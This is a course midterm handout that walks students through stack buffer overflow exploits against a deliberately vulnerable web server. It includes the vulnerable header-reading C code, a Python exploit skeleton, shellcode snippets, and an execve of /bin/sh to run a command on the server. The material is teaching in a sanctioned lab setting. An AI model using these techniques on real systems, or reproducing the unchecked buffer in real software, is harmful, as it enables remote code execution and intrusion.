cs24-23fa Midterm: Adventure

Introduction to Computing Systems (Fall 2023)

Introduction

Over the past few weeks, we have discussed representation, assembly, the stack, and buffer overflows. In this midterm, you will put all of this together to hack into one of our servers.

Setup

As usual, register for the assignment at https://grinch.caltech.edu/register, which will create a GitLab repository for you containing the starter code.

The Scenario

John is a recent CS graduate working for Adventures Incorporated (tm). He was tasked with creating the company’s website, which he finally got running here:

http://adventure.com.puter.systems/index.html


Unfortunately, John didn’t go to Caltech or learn about systems, so he used a small HTTP server called tiny that he found on the internet: https://gitlab.caltech.edu/john/adventures-tiny-server

Even more unfortunately, John was having problems getting the “save progress” feature working. So, he wrote some debugging code and accidentally left it in production…

Your Task

Your task for this midterm is to write several buffer overflow exploits against tiny that get various forms of your password on the server. By the end of this midterm, you will have arbitrary code execution on the remote machine. Please remember the honor code here: you will be able to delete other students’ progress, but we expect you not to. To make this as realistic as possible, we are relying heavily on the honor code for this one. Please don’t take advantage.

Orienting Yourself

The first thing you’ll have to do for this assignment is explore the web server you’ll be hacking. tiny is set up to serve a directory listing whenever you request a path that corresponds to a directory on the server. This is a standard web server feature that should usually be turned off, but not on John’s website! If you access the root (the website without index.html), it will list the root directory. Several directories are “forbidden” (namely, config and tokens), and these are the ones you will be hacking.

The web server runs from the /hackme/tiny directory. For example, running ls on the config directory gives the following:

Terminal

john@adventure.com.puter.systems:~$ ls /hackme/tiny/config
admin_token

The other files in /hackme/tiny are also useful, but we’ll let you explore them yourself. In particular, you might find it useful to download the binary itself, which John helpfully named tiny and left in the root directory of the website (consider using wget URL_FOR_TINY). This binary should run, and be debuggable with gdb, on labradoodle.


Throughout this midterm, we will refer to your “password”. All passwords for this midterm are 10 characters long.

There are three “stages” to this midterm, and we strongly recommend you complete them in order:

Stage 1: Return to a function (20 points)
Stage 2: Return to your own code (45 points)
Stage 3: Execute a shell command (25 points)

The attacks get increasingly difficult from stage to stage. We will, however, explain the exploit you should be writing for each stage. Determining what code is exploitable is not a major goal of this midterm; instead, we will focus on actually writing the attacks once a vulnerability has been identified.

HTTP Requests and Responses

When you type a URL into your browser, it communicates with the remote server via an “HTTP request”, which looks like this:

GET / HTTP/1.1
Host: www.caltech.edu
Connection: close

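This request is made up of several sections:

The request line (GET / HTTP/1.1), which contains the method (GET), the URL being requested (/), and the HTTP version (HTTP/1.1).
The headers, one Name: value pair per line (here, Host and Connection).
An empty line that ends the headers, followed by any data (this request has none).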

As a raw string, the HTTP request above looks like:

b"GET / HTTP/1.1\r\nHost: www.caltech.edu\r\nConnection: close\r\n\r\n"

Notice the \r\n after the first line, the \r\n between headers, and the trailing \r\n\r\n before any data (of which this request has none). Also notice the b in front of the string; this indicates that it is a byte string. For our purposes, all you really need to know is that (1) we should always use byte strings when sending over a connection, and (2) you can concatenate them like regular strings.
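To make that structure concrete, here is a small sketch that splits the raw request above back into its pieces. The function name split_request is our own (it is not part of tiny or the starter code); it relies only on the separators just described: the first \r\n\r\n ends the headers, and \r\n separates the lines before it.

```python
def split_request(raw: bytes):
    """Split a raw HTTP request into (request_line, headers, data)."""
    # The first \r\n\r\n ends the header section; everything after it is data.
    head, _, data = raw.partition(b"\r\n\r\n")
    # Within the head, \r\n separates the request line from each header line.
    request_line, *headers = head.split(b"\r\n")
    return request_line, headers, data


raw = b"GET / HTTP/1.1\r\nHost: www.caltech.edu\r\nConnection: close\r\n\r\n"
line, headers, data = split_request(raw)
print(line)     # b'GET / HTTP/1.1'
print(headers)  # [b'Host: www.caltech.edu', b'Connection: close']
print(data)     # b''
```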

This midterm will require manipulating raw HTTP requests, so we have drafted a little python3 script for you that sends a request to www.caltech.edu and prints out the data sent back. Note that this script isn’t complete: you need to put the pieces of the request together on the line that assigns request.

example-request.py

import socket

METHOD = b"GET"
URL = b"/"
HEADERS = b"Host: www.caltech.edu"

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# By default, web browsers request unencrypted websites on port 80.
# We want to simulate a "default" request here.
client.connect(("caltech.edu", 80))
request = b"PUT TOGETHER THE PIECES HERE. DON'T FORGET TO USE \r\n's!"
print(request)
client.send(request)
response = client.recv(4096)
print(response.decode())

Uh Oh, Buffer Overflow…

Consider the following snippet of code which can be found in eat.c (part of the tiny webserver). Note that HEADERS_SIZE is a constant defined elsewhere.

eat.c

int eat_headers() {
	char garbage[HEADERS_SIZE];
	i = 0;
	garbage[0] = getc(stream);
	i++;
	garbage[1] = getc(stream);
	i++;
	garbage[2] = getc(stream);
	i++;
	garbage[3] = getc(stream);

	while (garbage[i - 3] != '\r' || garbage[i - 2] != '\n' ||
               garbage[i - 1] != '\r' || garbage[i]     != '\n') {
		i++;
		garbage[i] = getc(stream);
	}
	return 1;
}

As advertised, this function “eats” (reads and discards) the HTTP headers of a connection called stream. tiny is not written very well; for example, stream and i are both global variables. Worse (or better, for us!), the loop keeps storing characters into garbage until it sees \r\n\r\n and never checks i against HEADERS_SIZE, so headers longer than the buffer are written past its end. This code is susceptible to a buffer overflow attack!
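One way to convince yourself the overflow is real is to replay the loop in Python. The sketch below (bytes_stored_by_eat_headers is a hypothetical helper, and the HEADERS_SIZE value is made up, since the real constant is defined elsewhere in tiny) counts how many bytes eat_headers would write into garbage for a given input. Because the only stopping condition is \r\n\r\n, the count grows with the input no matter how big garbage is.

```python
TERMINATOR = b"\r\n\r\n"


def bytes_stored_by_eat_headers(stream: bytes) -> int:
    """Count how many bytes eat_headers would store into garbage for this input.

    Mirrors the C loop: four unconditional reads, then one more read per
    iteration until the last four stored bytes are \\r\\n\\r\\n. Nothing
    compares i against HEADERS_SIZE.
    """
    if len(stream) < 4:
        raise ValueError("eat_headers always reads at least four bytes")
    i = 3  # after the four unconditional reads, garbage[0..3] are filled
    while stream[i - 3:i + 1] != TERMINATOR:
        i += 1
        if i >= len(stream):
            # Real tiny would keep calling getc and storing the result here.
            raise ValueError("input ended before \\r\\n\\r\\n")
    return i + 1  # garbage[0] through garbage[i] were written


HEADERS_SIZE = 64  # hypothetical; the real value is defined elsewhere in tiny
payload = b"A" * 100 + TERMINATOR
print(bytes_stored_by_eat_headers(payload) > HEADERS_SIZE)  # True
```

Two consequences are worth noticing: eat_headers stops at the first \r\n\r\n, so anything after it stays in the stream for later code to read, and a \r\n\r\n that appears early in an exploit string would end the overflow early.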

Converting an Address Into Bytes

When writing exploit strings, you will often need to convert a numerical address into the corresponding string of raw bytes.

Hex Number: 0xdeadbeef
Raw String: b'\xef\xbe\xad\xde\x00\x00\x00\x00'

Notably, the bytes in the raw string are in reverse order, because we’re working on a little-endian machine, and the string is padded with zero bytes to a length of 8, the size of an address on x86-64. This can be very annoying to do by hand; luckily, python3 gives us a function that makes it easy:

def to_bytes(i, l=8):
    return int.to_bytes(i, length=l, byteorder='little')

We strongly recommend running any Python scripts you write or use for this midterm with python3, NOT python2!
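As a quick check, the sketch below applies to_bytes to the example address and converts the result back with int.from_bytes. struct.pack with the '<Q' format (little-endian, unsigned 64-bit) is an equivalent standard-library alternative, shown here only for comparison.

```python
import struct


def to_bytes(i, l=8):
    """Little-endian encoding of i in l bytes (the helper given above)."""
    return int.to_bytes(i, length=l, byteorder='little')


addr = to_bytes(0xdeadbeef)
print(addr)  # b'\xef\xbe\xad\xde\x00\x00\x00\x00'

# Round-trip and cross-check, useful when debugging an exploit string:
assert int.from_bytes(addr, byteorder='little') == 0xdeadbeef
assert struct.pack('<Q', 0xdeadbeef) == addr  # '<Q' = little-endian unsigned 64-bit
```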

From HTTP Request to Exploit

All three attacks you will write involve preparing exploit strings of varying complexity. Usually, they will consist of two pieces: (1) padding bytes and (2) a return address. We will send these in the headers of the HTTP request, because eat_headers has the bug we’re exploiting. Altogether, the core of the script you’ll be writing looks like this:

sploit.py

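import socket


def to_bytes(i, l=8):
    # Encode the integer i as l little-endian bytes
    return int.to_bytes(i, length=l, byteorder='little')


# The method should always be GET
METHOD = b"GET"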

# We don't care what URL we're grabbing; they all have the possibility of exploit...
URL = b"/"

# Figure out how many bytes we need to pad until we get to the return address
# on the stack. (Hint: It's not 10...)
N = 10
PADDING = b"\xff" * N

# Fill this in with the address you actually want instead of `0xdeadbeef`
ADDRESS = to_bytes(0xdeadbeef)

# The "exploit string" is what we send in as the headers
HEADERS = PADDING + ADDRESS

# The functions we call will often look in the request's data for a password.
# So, we send it here.
DATA = b"YOUR_PASSWORD"

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(("adventure.com.puter.systems", 80))
request = b"PUT TOGETHER THE PIECES HERE. DON'T FORGET TO USE \r\n's!"
print(request)
client.send(request)
response = client.recv(4096)
print(response.decode())
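Because eat_headers stops at the first \r\n\r\n it stores, it can be worth checking that your exploit bytes (including the address) don’t contain that sequence themselves. Below is a sketch of such a check. exploit_fits is a hypothetical helper, and it assumes that your request puts \r\n\r\n immediately after HEADERS and that eat_headers starts storing right where HEADERS begins.

```python
TERMINATOR = b"\r\n\r\n"


def to_bytes(i, l=8):
    # Same little-endian helper as in sploit.py
    return int.to_bytes(i, length=l, byteorder='little')


def exploit_fits(headers: bytes) -> bool:
    """True if eat_headers would store every byte of `headers`.

    Assumes \\r\\n\\r\\n is sent right after `headers`, and that eat_headers
    stops right after the FIRST \\r\\n\\r\\n it stores.
    """
    stream = headers + TERMINATOR
    stored = stream.find(TERMINATOR) + len(TERMINATOR)
    return stored >= len(headers)


print(exploit_fits(b"\xff" * 10 + to_bytes(0xdeadbeef)))    # True
print(exploit_fits(b"\xff" * 4 + TERMINATOR + b"\xff" * 6))  # False
# An unlucky address can contain the terminator: 0x0a0d0a0d encodes as \r\n\r\n\0\0\0\0
print(exploit_fits(b"\xff" * 10 + to_bytes(0x0a0d0a0d)))    # False
```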

Stage 1: Return to a function (20 points)

In this exploit, you will change a return address on the stack to make tiny execute a different function of your choice.

Stage 1.5: Running Your Own tiny (0 points)

We will need some information about tiny as it executes, so we need our own instance of tiny running on labradoodle.

Making tiny Executable

In the last stage, you downloaded tiny, but if you tried to run it, you might have gotten an error message (-bash: ./tiny: Permission denied). This is because we need to mark the file as “executable”. To do this, run chmod +x tiny. Now, you’ll be able to run tiny on your own. Note that tiny takes one argument: the port to run on. Choose (and remember!) some number larger than 9000 for this argument. Running tiny directly won’t let us capture debugging information, though; for that, we need a debugger.

Using gdb to inspect tiny while it runs

We recommend reading our short gdb tutorial, which can be found here, before continuing. Here is an example gdb session in which we run tiny and determine the address of the clientaddr variable in the accept_connection function:

Terminal

blank@labradoodle:~$ gdb ./tiny
GNU gdb (GDB; openSUSE Leap 15.0) 8.3.1
...
>>> b accept_connection
Breakpoint 1 at 0x400fd7: file junk.c, line 69.
>>> run PORT
>>> p &clientaddr
$1 = (struct sockaddr_in *) ADDRESS

Why Bother?

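In the next stage, we will need the address of the garbage buffer in eat_headers. The process for getting the address of this buffer is very similar to our example. You should follow approximately the same steps with the following exceptions:

Set the breakpoint on eat_headers instead of accept_connection.
Print &garbage instead of &clientaddr.
eat_headers only runs once tiny receives a request, so send a request to your own tiny (on labradoodle, at the port you chose) to reach the breakpoint.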

Stage 2: Return to your own code (45 points)

In the first stage, we caused execution to jump to an existing function and run it. This is already really powerful, but we can do better! What if, instead of jumping to code that exists, we jumped to our own code? In this exploit, you will cause tiny to jump to code of your own design which will call several existing functions to complete your goal.

Shellcode

At its core, code is just executable bytes at a memory location. Remember that eat_headers helpfully reads the bytes we send onto the stack. So, is there any reason we can’t execute bytes on the stack? In the first attack, we replaced the return address with the address of a particular function, but this time, we’ll replace it with the address where our code will be…on the stack. Just as you had to carefully count bytes to calculate where to put the address, this time you will need to do a similar count to figure out where you’re putting the bytes that represent your code. This will be some offset from garbage’s address as calculated in the previous stage.
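To make the offset arithmetic concrete, here is a sketch of one possible layout: padding, then the overwritten return address, then the shellcode. It assumes the headers are stored starting at garbage[0] and that the return address slot is 8 bytes wide, so the shellcode begins at garbage’s address plus the padding length plus 8. build_stage2_headers is a hypothetical helper, and the address and lengths in the usage are made up; you would substitute the garbage address you found with gdb and your own byte count.

```python
def to_bytes(i, l=8):
    # Little-endian helper from "Converting an Address Into Bytes"
    return int.to_bytes(i, length=l, byteorder='little')


def build_stage2_headers(garbage_addr: int, padding_len: int, shellcode: bytes) -> bytes:
    """Hypothetical layout: [padding][return address][shellcode].

    Assumes the headers are stored starting at garbage[0] and that the
    return address slot begins padding_len bytes into garbage, so the
    shellcode right after that 8-byte slot starts at
    garbage_addr + padding_len + 8.
    """
    shellcode_addr = garbage_addr + padding_len + 8
    return b"\xff" * padding_len + to_bytes(shellcode_addr) + shellcode


# Made-up values: substitute the garbage address from gdb and your own count.
headers = build_stage2_headers(0x7fffffffe000, 24, b"\xcc")  # \xcc (int3) is a placeholder
print(hex(int.from_bytes(headers[24:32], byteorder='little')))  # 0x7fffffffe020
```

Putting the shellcode inside the padding (and returning to garbage’s own address) is another option, but keep in mind that after the ret, %rsp points just past the return address slot, so any pushes or calls your shellcode makes write into the bytes below it, which is where the padding lives.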

The “code” that we write as an exploit is usually called “shellcode”; it is named that way because the goal of shellcode is usually to start a shell. In stage 3, we will do exactly this!

(N.B. In the real world, modern systems mark the stack as non-executable, using the “NX bit”, to prevent exactly what we’re about to do, but this protection is turned off for the purposes of this midterm.)

Absolute Calls

You will likely find yourself trying to callq a particular address in this exploit. Unfortunately, if you try this naively, like so:

bad-call.s

callq *$0xdeadbeef

You get the following output:

Terminal

blank@labradoodle:~$ as bad-call.s
Error: immediate operand illegal with absolute jump

That is, you cannot use an immediate address as the target of an absolute (indirect) call. Instead, you must put the address in a register first, like this:

better-call.s

movq $0xdeadbeef, %rax
callq *%rax

Use cs24-dasm or gdb to get the actual bytes of your shellcode after assembling it with as.
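Once you have the bytes, you still need them as a Python byte string to splice into your exploit. A minimal sketch, assuming you copy just the hex byte values (space-separated, optionally with 0x prefixes) from your disassembly: bytes.fromhex does the conversion. shellcode_from_dump is our own hypothetical name. The dump in the usage is illustrative only: we believe 48 b8 followed by an 8-byte immediate is a movabs into %rax and ff d0 is callq *%rax, but always copy the real bytes for your own code from cs24-dasm or gdb.

```python
def shellcode_from_dump(dump: str) -> bytes:
    """Convert hex byte values copied from a disassembly into a byte string.

    Accepts "48 b8 ..." or "0x48 0xb8 ..."; it expects only byte values,
    not addresses or mnemonics.
    """
    return bytes.fromhex(dump.replace("0x", ""))


# Illustrative dump (movabs into %rax, then callq *%rax); copy your real bytes.
code = shellcode_from_dump("48 b8 ef be ad de 00 00 00 00 ff d0")
print(len(code))  # 12
print(code[-2:])  # b'\xff\xd0'
```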

With a careful application of these concepts, you have enough to write this exploit!

Stage 3: Execute a shell command (25 points)

Finally, you will implement the holy grail. In this exploit, you will force tiny to run your shellcode, which loads and executes a shell running a command of your own design. In reality, this command could do anything you wanted; for the purposes of this midterm, it will create a file on the file system.

System Calls and the syscall Instruction

A system call is a request to the operating system (specifically, the kernel) to complete an operation on behalf of the user program. You’ve used many system calls without knowing it; for example, every file operation is, at its core, a system call. We’ll talk much more about these later, but for now, it suffices to know that if we want to execute a program, we can ask the OS to do it for us using the execve system call.

Because we’re writing shellcode, we need to know how to request a system call from assembly. To do this, one uses the syscall instruction. Like callq, it takes its arguments in registers, but the registers differ slightly from the function-call convention: the system call “number”, which tells the OS which operation to complete, goes in %rax, and the fourth argument goes in %r10 instead of %rcx. A full list of system call numbers can be found at https://filippo.io/linux-syscall-table/. For our purposes, we will only care about exit (which is #60) and execve (which is #59).

Use the following registers to complete a syscall:

Contents:  Syscall #  Param 1  Param 2  Param 3  Param 4  Param 5  Param 6
Register:  %rax       %rdi     %rsi     %rdx     %r10     %r8      %r9

For example, to make an exit(0) system call, we’d write the following x86-64 code:

movq $60, %rax  # use the exit syscall
movq $0, %rdi   # exit code 0
syscall         # make the syscall
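The register table can also be read as a simple mapping. The sketch below is purely illustrative (syscall_registers and the SYS_* constants are our own names, with the numbers taken from the text above): it pairs a syscall number and its arguments with the registers they must be loaded into, which can be a handy way to plan shellcode before writing the movq instructions.

```python
SYSCALL_ARG_REGISTERS = ["%rdi", "%rsi", "%rdx", "%r10", "%r8", "%r9"]
SYS_EXECVE = 59
SYS_EXIT = 60


def syscall_registers(number: int, *args: int) -> dict:
    """Map a syscall number and its arguments onto the registers in the table."""
    if len(args) > len(SYSCALL_ARG_REGISTERS):
        raise ValueError("x86-64 Linux syscalls take at most six arguments")
    regs = {"%rax": number}
    regs.update(zip(SYSCALL_ARG_REGISTERS, args))
    return regs


print(syscall_registers(SYS_EXIT, 0))  # {'%rax': 60, '%rdi': 0}
```

For execve(filename, argv, envp), the three pointers would land in %rdi, %rsi, and %rdx respectively.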

The execve System Call

To really understand what execve is doing, we must understand processes, which we won’t get to until later. So, we’ll provide a working definition that is enough to do the current assignment.

execve() executes the program pointed to by filename. This causes the program that is currently being run by the calling process to be replaced with a new program, with newly initialized stack, heap, and (initialized and uninitialized) data segments. The execve system call has the following signature:

int execve(const char *filename, char *const argv[], char *const envp[]);

Notably, since we will be making the execve syscall from assembly, we will have to set up every argument by hand: the filename string, each argument string, and the NULL-terminated arrays of pointers to those strings that argv and envp refer to. Getting those right will be the hardest part of this exploit!

Shells and Shell Scripts

When you type into a terminal, there is a program (called a “shell”) that interprets what you write and executes the commands you type. (Incidentally, it does this using the execve syscall from above…) Specifically, the standard shell is called sh (commonly provided by bash) and can be found at /bin/sh on most machines. This is the program that you will be execveing using your h4x0r skillz! In particular, since you are trying to create a token file named after your password whose contents are derived from your username, the shell command you will want to run is:

/bin/sh -c 'echo -n "USERNAME" | sha384sum > /hackme/tiny/tokens/PASSWORD'

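Note that /bin/sh is the name of the program, and -c and the rest of the line are its two arguments. Do not include the single quotes around the second argument in your exploit; they are only there so that a shell you type this line into treats the whole command as one argument.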

That is, your argv array for execve should look like {"/bin/sh", "-c", "echo -n USERNAME | sha384sum > /hackme/tiny/tokens/PASSWORD", NULL}, where, by convention, argv[0] is the program name itself.
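For comparison, here is the same kind of execve made from Python on Linux with the standard os.fork, os.execve, and os.waitpid functions (run_shell_command is our own hypothetical helper, and the PATH value passed as the environment is an assumption). Python builds the NULL-terminated argv and envp arrays for you, which is exactly the part your shellcode must lay out in memory by hand. The sketch forks first so that the process replaced by /bin/sh is a child rather than the Python interpreter running the script, and it uses a harmless echo instead of the stage 3 command.

```python
import os


def run_shell_command(command: str) -> int:
    """Fork, execve /bin/sh -c COMMAND in the child, and return its exit code."""
    argv = ["/bin/sh", "-c", command]  # argv[0] is, by convention, the program path
    pid = os.fork()
    if pid == 0:
        # Child: if execve succeeds it never returns; this process becomes /bin/sh.
        # Python builds the NULL-terminated argv and envp arrays for us here.
        try:
            os.execve("/bin/sh", argv, {"PATH": "/usr/bin:/bin"})
        finally:
            os._exit(127)  # only reached if execve failed
    _, status = os.waitpid(pid, 0)
    return os.WEXITSTATUS(status) if os.WIFEXITED(status) else -1


status = run_shell_command("echo hello from /bin/sh")  # the child prints the greeting
print(status)  # 0
```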

As you have likely gathered at this point, you could send whatever command you wanted to do whatever nasty things you wanted on a machine if you can execve /bin/sh!

Putting it all together


Extra Credit: Proof of Arbitrary Code Execution (+5 points)

Since the third stage gives you a shell, you now have arbitrary code execution. To prove that you understand what you’ve done, add a new link to the index.html page, along with a corresponding directory and index.html page for your link to point to. Make sure to sign the page in some way using your access username.